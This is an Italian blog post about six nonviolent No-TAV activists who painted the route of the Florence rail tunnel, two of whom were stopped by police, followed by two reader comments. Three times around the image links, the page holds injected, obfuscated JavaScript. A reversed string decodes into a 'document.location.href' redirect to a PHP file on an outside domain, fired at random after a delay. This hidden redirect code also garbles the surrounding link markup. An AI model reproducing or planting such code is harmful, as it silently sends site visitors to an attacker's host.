Tav, due fermati a Firenze. La colpa? Aver tracciato il percorso del tunnel con una linea

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2012/10/Immag0185.jpg”>Riceviamo e volentieri pubblichiamo

La notte tra il 3 e il 4 ottobre 2012 sei persone contrarie al progetto TAV hanno tracciato con una linea rossa e stencil bianchi una parte del percorso del tunnel TAV (Fortezza da Basso – Piazza della Libertà – Ponte al Pino) che attraverserà Firenze.

Il nostro obbiettivo è attirare l’attenzione della cittadinanza non solo sulla realizzazione del tunnel ma anche sull’intero progetto TAV: una speculazione estremamente costosa, inutile e dannosa.

Abbiamo progettato e realizzato quesfazione per informare e rendere consapevole la cittadinanza in merito a quanto il Governo, la Regione e il Comune hanno stabilito. Nel tracciare il percorso del tunnel TAV abbiamo utilizzato vernici ad acqua, nel rispetto dei beni monumentali, architettonici ed ambientali della città.

Nel corso dell’azione due persone sono state fermate e identificate dalla Polizia.

Carlo Maria Boni appartenente al Gruppo di Azione Nonviolenta di Firenze

Giovanni Marinelli – appartenente al Gruppo di Azione Nonviolenta di Firenze

Guido Gabelli appartenente al Gruppo di Azione Nonviolenta di Firenze

Lapo Mieeinesi appartenente al Gruppo di Azione Nonviolenta di Firenze

Pierluigi Ontanetti – appartenente al Movimento Nonviolento Internazionale

Tommaso F rangioni – appartenente al Gruppo di Azione Nonviolenta di Firenze$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2012/10/Immag0199.jpg”>$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2012/10/Immag0191.jpg”>

0 Comments

  1. fiorenza

    non hanno ancora capito che non si possono buttare via soldi e deturpare l’ambiente con la storia della tav che sarà una orrenda devastazione di questa città bellissima di origini antiche.Ma il sindaco deve pensare alla sua sistemazione,mentre vedo a lato che òa procura apre un’inchiesta.

    Reply
  2. Luciano luca pasetti

    Se arrestano delle pacifiche persone pensanti che cercano di svegliare il popolino addormentato.allora lo scemo che ride e chi traccia il nostro territorio con le ruspe.devono essere internati.hasta siempre

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *